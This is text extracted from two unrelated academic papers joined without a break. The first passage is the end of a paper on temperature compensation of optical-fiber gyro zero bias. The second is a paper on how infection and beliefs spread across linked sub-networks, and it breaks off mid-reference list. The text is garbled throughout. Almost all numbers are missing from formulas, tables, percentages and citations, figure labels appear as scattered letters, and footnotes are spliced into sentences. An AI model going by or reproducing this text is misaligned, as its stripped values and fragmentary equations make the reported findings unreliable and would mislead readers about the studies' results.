temperature was an important factor affecting the precision of optical-fiber gyro zero bias[ - ], the effect of temperature on the optical-fiber gyro zero bias mainly in three aspects of temperature, temperature change rate and temperature gradient. based on the above three factors, the temperature drift of gyro can be fitted by polynomial, and the model structure was as follows: ( )           qm n i j k i j k i j k dt l l at b c t dt ( ) l----gyro output, unit º/h. l ----the zero bias output obtained from the first two minutes of sampling after the gyro was started, unit º/h. t ---- gyro sensitive temperature, unit ℃. Δ t ---- temperature gradient of gyro, unit ℃. dt/dt ---- the temperature change rate of gyro unit ℃/s. ai, bj and cj ---- polynomial coefficients, m, n -- the highest power of all temperature factors. the coefficients ai, bj and cj in model polynomial were fitted by regression analysis and least square method. the polynomial model can be written as: l - l = t a ( )                     q q q n n n t t t t t t t t t t               q a a a a q was the order of the temperature drift model, and t was the temperature matrix, and n was the data number of gyro temperature drift. the coefficients fitted at different temperatures were different. the coefficients of ai, bj and ck satisfy the following relation in formula ( ):                   q q q q q q q q a a a t a t a t a a a t a t a t a a a t a t a t ( ) the coefficient aij (i= , …q;j= , , , ) was obtained by least square calculation for each gyro at different temperatures. solidify the coefficients in the computer test software. as long as the initial temperature t of the gyro was measured after the gyro was started, the coefficients in the model can be calculated according to formula ( ). then, according to the temperature factors, the zero bias compensation model of the current gyro was estimated by using polynomial model formula ( ), and the estimated zero bias caused by temperature can be calculated and can be fixed. international conference on sensor network and computer engineering (icsnce ) iv. optical-fiber gyro zero bias characteristics compensation result the influence of temperature on zero bias was mainly shown in three aspects: temperature, temperature change rate and temperature gradient[ - ]. for a comprehensive analysis of the temperature character of zero bias of optical-fiber gyro, effect of temperature, effect of temperature change rate and effect of temperature gradient were all compensated. the highest temperature compensation to order, order compensation for temperature gradient temperature change rate, order compensation for temperature gradient. a. temperature affects compensation results using the data in table , the polynomial of temperature on the zero bias of the gyro was fitted to each order curve, and the result was shown in figure . according to the fitting results, the gyro zero bias data was compensated for the continuous change of temperature from - ℃ to ℃ in fig. , the and order compensation results were shown in figure . the comparison of the results of each order compensation was shown in table . test result linear order order order order order g y ro o u tp u t er ro r gyro temperature sensor figure . polynomial fitting curve about the gyro zero bias caused by temperature g y ro o u tp u t a ft e r sm o o th g y ro te m p e ra tu re se n so r figure . the influence about temperature to gyro zero bias g y ro o u tp u t g y ro te m p e ra tu re s e n s o r orginal output after smooth after order compensation temperature g y ro o u tp u t g y ro te m p e ra tu re s e n s o r orginal output after smooth after order compensation temperature figure . gyro output by \ order polynomial compensation while temperature transition table ii. gyro output by to order polynomial compensation while temperature transition compensation method gyro zero bias mean value(º/h) gyro zero bias standard deviation (º/h) none . . linear . . order . . order . . order . . from table , it can be seen that the standard deviation of gyro zero bias was smaller after compensation, and the two order polynomial compensation was the best. b. compensation result of temperature gradient change the relationship between the temperature gradient and the gyro zero bias was shown in figure . g y ro o u tp u t te m p e ra tu re g ra d ie n t gyro temperature sensor gyro output temperature gradient figure . relationship between temperature gradient and gyro zero bias international conference on sensor network and computer engineering (icsnce ) based on temperature compensation, temperature gradient compensation was added on the zero bias, the zero bias standard deviation was shown in table . table iii. the result after adding compensation by temperature gradient compensation method gyro zero bias mean value(º/h) gyro zero bias standard deviation (º/h) none . -- linear . . order . . order . . order . . according to the date from table , on the same order after adding the temperature gradient compensation the results was improved obviously, and two order polynomial compensation effect was the best, standard deviation was reduced to the original value of / . c. compensation result of temperature change rate in figure , the difference between each point data and the average value can reflect the influence of the temperature change rate on the gyro zero bias to a certain extent. on the basis of considering the temperature and temperature gradient, the influence of temperature change rate on the gyro zero bias was also added. the and order fitting results were shown in fig . the comparison of the results of each order compensation was shown in table . orginal data order compensation temperature gradient temperature transition rate g y ro o u tp u t orginal data order compensation temperature gradient temperature transition rate g y ro o u tp u t figure . gyro output by \ order polynomial compensation after temperature transition\temperature gradient\temperature transition rate table iv. compensation result after temperature transition\temperature gradient\temperature transition rate compensation method gyro zero bias mean value(º/h) gyro zero bias standard deviation (º/h) none . . linear . . order . . order . . order . . from table and figure can be seen through the “four order polynomial + temperature difference + change rate of the temperature ”compensation effect was obvious, the gyro zero bias standard deviation can be reduced to / by the fitting," the compensation effect was obvious. v. conclusion temperature was one of the most important factors that affect the zero bias of optical-fiber gyro. the temperature characteristics about optical-fiber gyro has to be studied and zero bias caused by the temperature changes must be compensated if optical-fiber gyro can be used in the field of engineering application. based on the analysis of the influence mechanism of optical-fiber gyros working principle and temperature influence to zero bias, temperature test of optical-fiber gyro was carried out, zero bias compensation method was studied, and the compensation effect was analyzed by experiment data. the experiment results show that the influence of temperature on the zero bias of optical-fiber gyro was effectively reduced by using multinomial fitting method, which were compensated by three aspects of temperature, temperature gradient and temperature change rate. references [ ] han bin, lin yu-rong, deng zheng-long. overview on modeling and compensation of fog temperature drift[j]. journal chinese inertial technology, , ( ): - . [ ] xu hong-jie, zhang wen-yan, xu xiaobin,et al. research on thermal induced non-reciprocity in optical-fiber gyro with double optical length[j]. acta photonica sinica, , ( ): - - . [ ] yu xuhui, ma huilian, jin zhonghe, et al. improving thermal stability of a resonator optical-fiber gyro employing a polarizing resonator[j]. optics express, , ( ): - . [ ] lefèvre h c. the fiber-optic gyro: achievement and perspective[j]. gyroscopy and navigation, , ( ): - . [ ] dusan agrez. improving phase estimation with leakage minimization[j]. ieee trans on im, , ( ): - . [ ] liu yimg, xu jin-tao, wang min-juan. analyswas and compensation of the temperature field inside fiber optic coil[j]. journal of xi an university of posts and telecommunications, , ( ): - . - [ ] liu jie-yu, yu zhi-yong, ma xue-wen. modeling and compensation of static temperature error synthetically for optical- fiber gyro[j]. acta optica sinica, , ( ): - . [ ] zhang yan-ping, pan zi-jun, wei zhi-wu, et al. hardwwere implementation of temperature compensation for fog ’ s scale- factor[j]. journal of chinese inertial technology, , ( ): - . what you believe travels differently: information and infection dynamics across sub-networks abstract: in order to understand the transmission of a disease across a population we will have to understand not only the dynamics of contact infection but the transfer of health-care beliefs and resulting health-care behaviors across that population. this paper is a first step in that direction, focusing on the contrasting role of linkage or isolation between sub-networks in (a) contact infection and (b) belief transfer. using both analytical tools and agent-based simulations we show that it is the structure of a network that is primary for predicting contact infection—whether the networks or sub-networks at issue are distributed ring networks or total networks (hubs, wheels, small world, random, or scale-free for example). measured in terms of time to total infection, degree of linkage between sub- networks plays a minor role. the case of belief is importantly different. using a simplified model of belief reinforcement, and measuring belief transfer in terms of time to community consensus, we show that degree of linkage between sub-networks plays a major role in social communication of beliefs. here, in contrast to the case of contract infection, network type turns out to be of relatively minor importance. what you believe travels differently. in a final section we show that the pattern of belief transfer exhibits a classic power law regardless of the type of network involved. authors: patrick grim is distinguished teaching professor of philosophy at stony brook, co-author of the philosophical computer (mit ) and beyond sets (ontos/verlag ). grim's publications appear not only in philosophy but in computer science, theoretical biology, cognitive science, linguistics, and game theory. christopher reade is a consultant at thoughtworks inc. and a graduate of the gerald r. ford school of public policy at the university of michigan. steven fisher is an undergraduate in complex systems studying networks and network theory in the center for the study of complex systems at the university of michigan. daniel j. singer is a ph.d. candidate in philosophy at the university of michigan working on foundational questions of epistemology and formal epistemology. dr. stephen majewicz is an associate professor in mathematics at kingsborough community college. his fields of interest include nilpotent groups, exponential a-groups and nilpotent r-powered groups, combinatorial group theory, and axiomatic set theory. acknowledgements: this work was supported in part by the national institute of general medical sciences midas grant u gm - , computational models of infectious disease threats, and by a pilot grant for developing an agent-based model to assess racial differences in medical discrimination, social support and trust, administered by the graduate school for public health at the university of pittsburgh. please contact patrick grim for correspondence at pgrim@notes.cc.sunysb.edu patrick grim department of philosophy, stony brook university stony brook, ny, usa christopher reade gerald r. ford school of public policy, university of michigan ann arbor, mi, usa daniel j. singer department of philosophy, university of michigan, ann arbor, mi, usa steven fisher center for study of complex systems, university of michigan ann arbor, mi, usa stephen majewicz department of mathematics, kingsborough community college brooklyn, ny, usa introduction public health has been a primary target for agent-based and network modeling. a significant amount of work has been done on the role of network structure in the spread of disease (meyers, pourbohloul, newman, skowronski & brunham ; keeling ; ferrari, bansal, meyers & bjørnstad ; miller & hyman ; eubank, guclu, kumar, marathe, srinivasan, toroczkai & wang ). but it is clear that health-care behaviors are as crucial in the pattern of any pandemic as are the biological characteristics of the pathogens involved (epstein, parker, cummings & hammond ; auld ; del valle, hethcote, hyman, & castillo-chavez ; barrett, bisset, leidig, marathe, & marathe ; funk, gilad, watkins, & jansen ; hallett, gregson, lewis, lopman, & garnett ). those health- care behaviors are contingent on beliefs. on standard models, these include at least beliefs regarding severity, susceptibility, effectiveness and the cost of preventive measures (harrison, mullen, & green ; janz & becker, ; mullen, hersey, & iverson ; strecher & rosenstock ). in order to understand the spread of disease we will have to better understand the spread of beliefs and behaviors. moreover, as public health interventions are often targeted to beliefs and behaviors we will have to better understand the spread of beliefs and behaviors in order to intervene effectively. for a better picture ofdisease dynamics and to better the prospects for effective intervention we need a better understanding of the dynamics of belief transmission across social networks. although important empirical work has been done on social networks and the diffusion of beliefs and behaviors (valente , ; morris, podhisita, wawer & handcock ; morris ; valente & davis, ; kincaid ; hamilton, handcock & morris ), significantly less has been done with the tools of agent-based modeling toward understanding the abstract dynamics of belief (see however centola & macy and golub & jackson, forthcoming). in what follows we take some steps in that direction, with an emphasis on the pervasive social phenomenon of sub-network groups or clusters. our social networks do not form a uniform and homogenous web. social communities are composed of sub- communities, with varying degrees of contact and isolation between them; both in terms of the physical contact necessary for disease transmission and the informational contact crucial to the transmission of belief. racial, ethnic, socio-economic, demographic, and geographical sub-communities offer a clear example. racial and economic sub- communities may be more or less isolated or integrated with other sub-communities, with varying strengths of information transfer, communication, and trust. in the case of a pandemic, degree of isolation or integration will be crucial in predicting the course of contact and therefore the dynamics of disease transmission. but in such a case degree of informational isolation or integration will also be crucial in tracking changes in health care beliefs and behaviors, with both immediate and long-range effects on the course of the disease. what we offer is an abstract model of this very real phenomenon. we track the role of degree of linkage between sub-networks in the transfer of disease and the transfer of information, with contrasting results in the two cases. linkages between sub-networks have also been termed 'bridges,' analogous to a concept of bridges in centola and may consider 'complex contagions', in which more than one neighbor is required for infection. this is not strictly speaking a reinforcement effect, but does show dynamics similar to that studied for belief reinforcement here—and a similar contrast with simple infection. golub and jackson outline analytic results on 'homophily' in random networks, with a similar emphasis on the contrast between diffusion and belief averaging. our work here, part analytic and part from agent-based simulations, extends that work and shows that the central contrast holds across networks of various types. computer networking and identified in trotter, rothenberg and coyle ( ) as a key area for future work in network studies and health care. l. c. freeman ( ) speaks of degree of linkage in terms of segregation and integration between sub-networks. ours is a formal study of networks, however, and such a terminology may carry distracting connotations. homophilous networks, in which nodes link preferentially with others with similar characteristics, often take the form of clustered sub-networks with limited degrees of linkage; precisely the type we study here. our focus is on the implications of a network structure, however, not how a network may have acquired that structure. we focus on the structure of contact and informational networks and the impact of that structure on the dynamics of infection and information. in the first section we outline simple analytic results and a wider spread of agent-based simulation results regarding the impact of degree of linkage between sub- networks on the spread of infection across a community. those results regarding simple diffusion serve as a base of comparison for the very different results regarding the effects of degree of linkage on the transmission of beliefs. the dynamics of belief turns out to be very different from the dynamics of contact infection. for infection, measured in terms of average time to total infection across a network, it is the structure of the network or its sub- networks that is of primary importance— whether the basic network or networks at issue form rings, total networks, hubs, wheels, small worlds, scale-free or random networks. the degree of linkage between sub-networks of such a type is of relatively minor importance for infection. for belief transmission on the model we construct, in contrast, measured in terms of average time to total consensus, network structure is of minor significance. where the dynamics of belief is at issue, it is the degree of linkage between sub-networks that is of primary importance. the effect of degree of linkage on belief change, we show, regardless of network type, shows the pattern of a classic power law. our effort here is to emphasize a basic point regarding the different dynamics of belief and infection across networks. more complete details of both analytic results and results from simulation are available in an on-line appendix at www.pgrim.org/connections. infection dynamics across linked sub- networks first example of ring and total networks figure shows a series of four network structures, clearly related in terms of structure. the network on the left is a single total network, also known as a complete network or maximal graph. the three pairs on the right form paired sub-networks with increasing numbers of connecting links. we will use degree of linkage in a relative sense to refer to increased connecting links or bridges of this sort. a quantitative measure is possible in terms of the number of actual linkages between nodes of distinct groups or sub-networks over the total possible. we focus on varying degrees of connection between sub-networks of varying structure. for simplicity we use just two sub-networks of equal size, concentrating on ring sub-networks, total or connected networks, small worlds, random and scale-free sub-networks. how does the degree of connection between two sub- networks affect the dynamics of diffusion or infection across the network as a whole? how do results on degree of connection between sub- networks of a specific structure compare with results on a single network of the same structure to which the same number of links are added? here theoretical fundamentals trace to granovetter ; and an early example of full linkage between total sub-networks, such that every node in one sub-network will connect to every node in the other sub-network, will result in the single total network on the left. but of course it will not hold in general that full linkage between sub- networks of type x will result in a single network of type x: full linkage between ring networks will not result in a single ring. figure . a single total network and increased degrees of linkage between total sub-networks network analysis regarding infection appears in klovdahl . some results are simple and analytic, but also indicate the variety that can be expected. consider, at one extreme, a network composed of two totally connected sub-networks with a single link between them, as in the second network in figure . how many steps will be required to total infection, starting from a single random infected node? assuming a % infection rate, where n is the total number of nodes, the average number of steps to total infection is: where n is the total number of nodes. from any node other than those on the ends of our connecting link, there are three steps to total infection: ( ) to all nodes of the immediate connected networks, ( ) across the one connecting link, and ( ) from there to all nodes of the opposite connected network. if the initially infected node is one of those on the ends of our connecting link, there are merely two steps to total infection, giving us the formula above. adding further links has no dramatic effect in such a case. because our sub-networks are totally connected, a first step in every case infects all nodes in a sub-network; from there any number of links between sub-networks merely transfer the infection to the second sub- network. for a network with two sub-networks of equal size, therefore, again assuming an infection rate of % rate and incorporating n nodes and m discrete links between sub- networks (links sharing no nodes), the average time to total infection will be simply: as n increases relative to m ≠ , time to infection approaches a limit of . as m increases relative to n, with a limit of m = . n, time to infection approaches a limit of . for a single total network, like that on the left in figure , any 'added' linkages would simply be redundant, with no effect at all: infection will in all cases be in a single step. where sub-networks are total, variance in infection time is necessarily just between and steps. at the other extreme is the case of a network with rings as sub-components. here variance in infection time is much greater. the maximal number of steps to full infection from a single node across a ring sub-network is s/ in order to keep the outline of basic relationships as simple as possible we ignore the complication that links can share a single node at one end. with s as the number of nodes for that sub- network where s is even, or (s – )/ in the case of odd numbers of nodes. the longest time for diffusion across a network of two equal-sized rings each with an even number of nodes n/ is therefore: where the number of nodes n/ in each sub- network is odd the maximal number of steps is: if the source of infection is one of the nodes on the end of a bridge between sub-networks, time to infection will be minimal: where n/ is even the minimal time to infection will be where n/ is odd, time to infection will be variance between maximum and minimum times to total infection is therefore extremely sensitive to the structure of sub-networks. in the case of total sub-networks, that variance is simply regardless of the number of nodes. in the case of ring sub-networks, the variance is close to n/ . the consequences for prediction are clear: to the extent that a social network approaches a total network, point predictions of infection times can be made with a high degree of confidence. to the extent that a social network approaches a ring, on the other hand, point predictions will not be possible without wide qualification. the structure of sub-networks is crucial for other factors as well. we have noted that increasing links between sub-networks has a minimal effect where those sub-networks are total. where sub-networks are rings of nodes, in contrast, the effect is dramatic. the top line in figure shows results from a computer-instantiated agent-based model in which we progressively increase the number of links between random nodes of those sub- networks from to . for each number between and we create networks with random links of that number between sub- networks, taking the average over the runs. for ring sub-networks the time to full infection decreases from an average of . steps for cases in which there is a single link between ring sub-networks to . for cases in which there are links. similar simulation results for added links between total sub-networks, in contrast, show a relatively flat result with decline in average time to infection from only . to . . difference in network structure clearly makes a major difference in time to total infection. that difference is not due to degree of linkage between sub-networks, however. a graph of results in which links are added across a single ring and not between ring sub-networks shows a result almost identical to that in figure . the lesson from ring and total networks is that it is not the degree of linkage between sub- networks that affects time to total infection but overall network structure itself, whether characterizing a single network or linked sub- networks. changes in infection rates with additional random links ( ) across a single network and ( ) between two smaller networks with the same structure show very much the same pattern. degrees of linkage between sub- networks interact with the structure of those sub-networks in order to generate patterns of infection, but it is the structure of the networks rather than the degree of linkage that plays the primary role. analytical and simulation results for hub and wheel networks, very much in line with conclusions above, are available in an online appendix (www.pgrim.org/connections). figure . average time to total infection with increasing links between sub-networks infection across small world, random, and scale-free networks for patterns of infection, the importance of general structure type over degree of linkage between sub-networks holds for small world, scale free, and random networks as well. results for small world networks are shown in the second line from the top in figure with roughly a % probability of rewiring for each node in an initial single ring (see watts & strogatz ). increasing linkages between sub-networks from to results in a decrease in steps to total infection from . steps to our probability is 'roughly' % because in each case we add minimal links so as to assure a connected network. without that assurance, of course, infection is not guaranteed to percolate through the network as a whole. . . increasing links within a single small world follows virtually the same pattern, with a decrease from . to . . similar results for random and scale-free networks appear in the third and fourth graphed lines of figure . for random networks, roughly . percent of possible connections are instantiated within each sub-network, with minimal links needed to guarantee connected networks. our scale-free networks are constructed by the preferential attachment algorithm of barabási and albert ( ). here as before there is little difference where additional links are added within a single network, whether small-world or scale-free. in each case the number of initial steps is slightly smaller, but only in the first steps or so is there any significant difference and convergence is to the same point. in the case of random networks, times decrease from . to . . in the case of scale-free networks, times decrease from . to . . in all the cases considered, it is not degree of linkage between sub-networks but the network structure involved in both single and linked sub-networks that produces network-specific signatures for infection. this largely accords with analytic results by golub and jackson (forthcoming) on diffusion dynamics across linked random networks. golub and jackson find that in the limit degree of linkage between random networks has no effect on time to total infection. what our results indicate is that such a result is by no means restricted to random networks, holding across network types quite generally. where infection is concerned, a prediction of time to total infection demands a knowledge of the general structure of the contact network at issue—ring or total, for example, scale-free or random, but does not demand that we know whether it is a single network or a linked set of smaller networks of that same structure that is at issue. infection on networks: qualifications and provisos results to this point have been calculated with an assumption of % infection—a disease guaranteed to be transmitted at every time-point of contact between individuals. more realistic assumptions regarding rate of infection affect the rates calculated above, more pointedly emphasizing the importance of structure. here we again use ring and total networks as an example. where sub-networks are total, probability of infection from single contact really makes a golub and jackson characterize their results using the term 'homophily', defined in terms of the relative probability of node connection within as opposed to outside of a group or sub-network. for random networks, though not for other network structures, this corresponds to the degree of linkage between sub-networks that is our focus here. difference only at the link between sub- networks: as long as the probability of infection exceeds /n, a quick infection of all individuals in the total sub-networks is virtually guaranteed. simulation results indicate that with a single link between total sub-networks the average time to full infection shifts only from an average of . steps to an average of . with a change of infection rate from % to %. for ring sub-networks, on the other hand, the same change in infection rate roughly doubles the time to full infection across all numbers of linkages. for more realistic infection rates, therefore, it is more important rather than less to know the structure of social networks. if those sub- networks approximate total networks, neither infection rate nor additional links between sub- networks make much difference. if sub- networks approximate ring networks, both number of links and infection rate will make a dramatic difference in the course of an infection. where average time to infection is our measure, degree of linkage between sub-networks as opposed to additional links within a single network of that structure is not of particular significance. but here we need to add an important proviso: this does not mean that the course of an epidemic across a single network and across sub-networks with various degrees of linkage is not significantly different. that dynamic is often very different—in ways that might be important for intervention, for example—even where average time to total infection is the same. the typical graphs in figure show the rate of new infections over time for (a) a single network and (b) linked sub- networks of that type. single networks show a smooth normal curve of increasing and declining rates of new infection. linked sub- networks show a saddle of slower infection between two more rapid peaks. despite uniformity of predicted time to total infection, therefore, sparsely linked sub- networks will always be 'fragile' at those links, with temporal saddle points in the course of an figure . contrasting dynamics of infection in single and linked sub-networks epidemic to match. those weak linkages and saddle points offer crucial opportunities for targeted vaccination in advance of an epidemic, or intervention in the course of it. information dynamics across linked sub- networks what you believe travels differently. in what follows we use a simple model of belief updating to show the crucial importance of degree of sub-network linkage in belief or information transmission across a network. some earlier results have noted similarities in infection dynamics and the spread of ideas (newman , redner , börner et. al. ). our purpose is to emphasize crucial differences between them. in this first model our agents' beliefs are represented as a single number between and . these are beliefs in the severity of a disease, perhaps, the probability of contracting the disease, or the effectiveness of vaccination. (harrison, mullen, & green ; janz & becker, ; mullen, hersey, and iverson, ; strecher & rosenstock, ). agents are influenced by the beliefs of those around them, updating their belief representation in terms of the beliefs of those with whom they have information linkages. to this extent we can argue that the model is relatively realistic: some beliefs can be represented on such a scale, and people are influenced to change those beliefs by, among other things, the expressed beliefs of those with whom they have contact. what is admittedly unrealistic is the simple form of belief updating we use in the model: an averaging of current beliefs with those with whom one has network contact. no-one thinks that averaging of beliefs in an informational neighborhood captures the real dynamics of belief change. such a mechanism does, however, instantiate a pattern of reinforcement: the more one's beliefs are like those of one's network neighbors, and the more they are like more of one's network neighbors, the less inclination there will be to change those beliefs. the more one's beliefs are out of sync with one's neighbors, the greater the pressure there will be to change one's beliefs. that beliefs will change in accord with some pattern of reinforcement along those lines is very plausible, backed by a range of social psychological data, and is therefore an aspect of realism in the model. what is unrealistic is the particular form of reinforcement instantiated here—the particularly simple pattern of belief averaging, applied homogeneously across all agents. in order to be informative regarding an exterior reality, a model, like any theory, must capture relevant aspects of that reality. in order to offer both tractability and understanding, a model, like any theory, must simplify. this first model of belief transmission is intended to capture a reality of belief reinforcement; the admittedly artificial assumption of belief averaging is our simplification. our attempt, then, is not to reproduce any particular pattern of realistic belief change but to emphasize the impact of certain predictable for background on both the importance and limit of realism in different forms of models, see grim, rosenberg, rosenfeld, anderson, & eason and rosenberg, grim, rosenfeld, anderson & eason . characteristics of belief change—with reinforcement a primary component—on the dynamics of belief. in particular, we want to emphasize the major differences between the dynamics of belief change across information networks and the dynamics of infection diffusion across contact networks, outlined above. what you believe travels differently. given belief averaging, and regardless of initial assignment of belief representations, all agents in this model eventually approach the same belief value. we can therefore measure the effect of network structure on belief convergence by measuring the number of steps required on average until all agents in the network are within, say, a range of . above or below the mean belief across the network as a whole. in what follows we use this range of variance from the mean as our measure of convergence, averaging over runs in each case. we begin with polarized agents. half of our agents are drawn from a pool with belief measures that form a normal distribution around . , with a deviation of . . the other half are drawn from a pool with belief measures in similar normal distribution around . . in studying linked sub-networks our agents in one sub-network are drawn from the . pool; those in the other are drawn from the . pool. in the case of single networks agents are drawn randomly from each pool. we found belief polarization of this form to be necessary in order to study the effects of sub-network linkage in particular; were beliefs of all our agents merely randomized, convergence to an approximate mean could be expected to occur in each sub-network independently, and time to consensus would not then be an adequate measure of the effect of sub-network linkage. belief diffusion across ring and total networks in outlining the dynamics of infection we contrasted linked sub-networks of particular structures—ring, small world, random, total, and scale-free—with single networks of the same structure. in exploring the dynamics of belief we will again study these types side by side. as we add additional links between sub- networks, how does the dynamics of belief diffusion change, measured in terms of time to consensus across the community. we progressively add random links ( ) between belief-polarized ring sub-networks, and ( ) within a single ring network of belief-polarized agents. average times to consensus are shown in figure . increasing linkages between polarized ring sub- networks makes a dramatic difference. average time to consensus for a single linkage in such a case is . . the average time to consensus for linkages is . , with a distinct and characteristic curve between them. for infection, we noted, there is virtually no difference between added links within a single ring network and added links between ring sub- networks. in the case of belief, in contrast, there is a dramatic difference between the two graphs. within a single total network, all agents will achieve a mean belief in a single step; additional linkages in such a case are merely redundant. results in total sub-networks, in contrast, parallel those for rings above. average steps to belief convergence with a single link approximate steps in both cases; with links, average time to convergence is in the case of rings and in the case of total sub-networks. the overall pattern of the two graphs is also very much the same. what that similarity shows is the striking effect of degree linkage in each case: an effect that in the transmission of belief overrides the fact that we are dealing with totally distributed ring networks in one case, totally connected networks in the other. belief transmission across small world, random, and scale-free networks the same contrasts between single and linked sub-networks in the case of belief transmission hold for other network structures as well. the effect of added linkages within a single small-world network closely parallels that for the single ring shown above. results for added linkages in small-world sub-networks are dramatically different. in absolute terms the results for small worlds differ from those shown for rings, declining from steps to . . the shape of the curve for small worlds, however, is very much that shown for rings above. given a single random network, using . % of possible linkages, additional linkages give a decline in time to belief consensus from only approximately steps to . where random sub- networks are at issue (using . % of possible linkages in each sub-network), the curve is again that displayed for rings above, though here absolute values decline from to . . for single scale-free networks, additional linkages give a roughly linear decline from to steps. for scale-free sub-networks, additional linkages again follow the curve shown above, here with absolute values dipping from to . . a similar curve characterizes effects of degree linkage in belief transmission regardless of the basic structure of the sub-networks involved. although absolute values across that curve differ significantly, the shape of the curve does not. we emphasize this point in figure by plotting belief transmission results for sub-network types in log-log form. linkage degree effects follow the same pattern regardless of the structure of sub-networks. if one wants to plot the course of an epidemic, we noted in section i, it is crucial that one knows the structure of the networks involved. if one wants to plot the course of belief transmission, knowledge of structure is much less important. the particular structure of networks is important in order to gauge whether a single link between sub-networks will allow consensus in steps or , as indicated for hub and total networks figure . time to belief consensus with increasing linkages in single ring and between ring sub-networks figure . time to belief consensus with increasing linkages between sub-networks (plotted log-log) in figure . the pattern of changes in belief transmission with increasing linkages between sub-networks from any initial point, however, is precisely the same regardless of network structure. that pattern is the classic signature of power law distributions, indicating that the relationship between increased linkage and time to consensus parallels a range of natural and social phenomena, including the relationship between frequency and size of earthquakes, metabolic rate and body mass of a species, size of a city and the number of patents it produces. power law distributions also appear in some empirically observed characteristics of biochemical, protein, citation and sexual contact networks (faloutsos, faloutsos, & faloutsos, ; jeong, tombor, albert, ottvai, & barbási ; fell & wagner ; liljeros, edling, amaral, stanley, & Åberg ; newman , ). the fact that such an effect appears in linkage effects on the dynamics of belief suggests the possibility of incorporating a range of theoretical and methodological work from other disciplines in studying behavior dynamics in the spread of disease, particularly with an eye to the effect of belief polarization, health care disparities, and social linkage or integration between ethnic and socio-economic sub- communities. conclusions & future work our focus here has been on the structure of contact and informational networks and the very different impact of aspects of that structure on the dynamics of infection and information. for infection, measured in terms of average time to total infection across a network, it is the structure of the network or sub-networks that trumps other effects. in attempting to gauge time to total infection across a community, the primary piece of information needed is whether the social network or component networks at issue approximate rings, hubs, wheels, small worlds, random, scale-free or total networks. for time to total infection, degree of linkage between sub-networks is of much less importance, though we have noted that points of linkage continue to play an important role with regard to fragility and prospects for targeted intervention. for information, measured in terms of average time to belief consensus, the importance of general structure and linkage between sub- networks are reversed. on the model of belief used here, in attempting to gauge the dynamics of information flow across a community, the primary piece of information needed is the degree of linkage between composite sub- communities, whatever their internal structure. the fact that the particular structure of those sub-communities is of lesser importance is highlighted by the fact that average time to belief consensus given increasing linkages follows the same familiar power-law pattern regardless of networks structures involved. it is quite plausible that belief transmission involves strong reinforcement effects; the model of belief used here is designed to capture such an effect. in other regards, however, the belief model used is quite clearly artificial. belief change is by simple averaging of information contacts, and all agents follow the same formula for belief updating. our attempt in future work will be to test the robustness of conclusions here by considering a range of variations on the central model of belief change. references auld, m. c. ( ). choices, beliefs, and infectious disease dynamics. journal of health economics , - . barbasi, a.-l. & r. albert ( ). emergence of scaling in random networks. science , - . barrett, c. l., k. bisset, j. leidig, a. marathe, & m. marathe ( ). estimating the impact of public and private strategies for controlling an epidemic: a multi-agent approach. proceedings of the twenty-first innovative applications of artificial intelligence conference, aaai, - . börner, k., maru, j. t., & goldstone, r. l. ( ). the simultaneous evolution of author and paper networks. proceedings of the national academy of sciences of the usa, (suppl. ), - . centola, d., & m. macy ( ). complex contagion and the weakness of long ties. american journal of sociology , - . del valle, s., h. hethcote, j. m. hyman, & c. castillo-chavez ( ). effects of behavioral changes in a smallpox attack model. mathematical biosciences, , - . epstein, j. m., j. parker, d. cummings, & r. a. hammond ( ). coupled contagion dynamics of fear and disease: mathematical and computational explorations. plos one ( ): e . doi: . /journal.pone. eubank, s., h. guclu, v. a. kumar, m. marathe, a. srinivasan, z. toroczkai, & n. wang ( ). modeling disease outbreaks in realistic urban social networks. nature : - . fell, d., & a. wagner ( ). the small world of metabolism. nature biotechnology , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . faloutsos, m, p. faloutsos, & c. faloutsos ( ). on power-law relationships of the internet topology. sigcomm ' , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . ferrari, m. j., s. bansal, l. a. meyers & o. n. bjørnstad ( ). network frailty and the geometry of herd immunity. proceedings of the royal societ. b , - freeman, l. c. ( ). segregation in social networks. sociological methods and research : - . funk, s., e. gilad, c. watkins, & v. a. a. jansen ( ). the spread of awareness and its impact on epidemic outbreaks. proceedings of the national academy of sciences ( ), - , www.pnas.org / cgi / doi / . / pnas. golub, b., & m. o. jackson, forthcoming. how homophily affects learning and diffusion in networks. granovetter, m. s. ( ). the strength of weak ties. american journal of sociology , - . grim, p., r. rosenberg, a. rosenfeld, b. anderson, & r. eason ( ). how simulations fail. group for logic & formal semantics research report # - , suny stony brook. hallett, t. b., s. gregson, j. j. c. lewis, b. a. lopman, & g. p. garnett ( ). africa: behavioral change in generalized hiv epidemics: impact of reducing cross- generational sex and delaying age at sexual debut. sexually transmitted infections , p. i -i . hamilton, d., m. handcock & m. morris ( ). degree distributions in sexual networks: a framework for evaluating evidence. sexually transmitted diseases , - . harrison, j. a., p. d. mullen, & l. w. green ( ). a meta-analysis of studies of the health belief model. health education research : – . janz, n. k., & m. h. becker ( ). the health belief model: a decade later. health education quarterly : – . jeong, h., b. tombor, r. albert, z. n. ottvai, & a.-l. barbási ( ). the large-scale organization of metabolic networks. nature , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . keeling, m., . the implications of network structure for epidemic dynamics. theoretical population biology , – . kincaid, d. l. ( ). mass media, ideation, and behavior: a longitudinal analysis of contraceptive change in the philippines. communication research , - . klovdahl, a. s. ( ). social networks and the spread of infectious diseases: the aids example. social science & medicine , - . liljeros, f., c. r. edling, l. a. nunes amaral, h. e. stanley, & y. Åberg ( ). the web of human sexual contacts. nature , - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . meyers, a. m., b. pourbohloul, m. e. j. newman, d. m. skowronski & r. c. brunham . network theory and sars: predicting outbreak diversity. journal of theoretical biology , – . miller, j. c. & j. m. hyman, effective vaccination strategies for realistic social networks. physica a , – . morris, m. ( ). sexual networks and hiv. aids (suppl a), s -s . morris, m., c. podhisita, m. j. wawer & m. s. handcock ( ). bridge populations in the spread of hiv/aids in thailand. aids , - . mullen, p. d., j. hersey, & d. c. iverson ( ). health behavior models compared. social science and medicine : – . newman, m. e. j. ( ). the structure of scientific collaboration networks. proceedings of the national academy of sciences, ( ), - , reprinted in newman, barbási, & watts, the structure and dynamics of networks, princeton: princeton university press, . newman, m. e. j. ( ). power laws, pareto distributions and zipf's law. contemporary physics : – . redner, s. ( ). how popular is your paper? an empirical study of the citation distribution. european physical journal b , - . rosenberg, r., p. grim, a. rosenfeld, b. anderson & r. eason ( ). the science in simulation: a 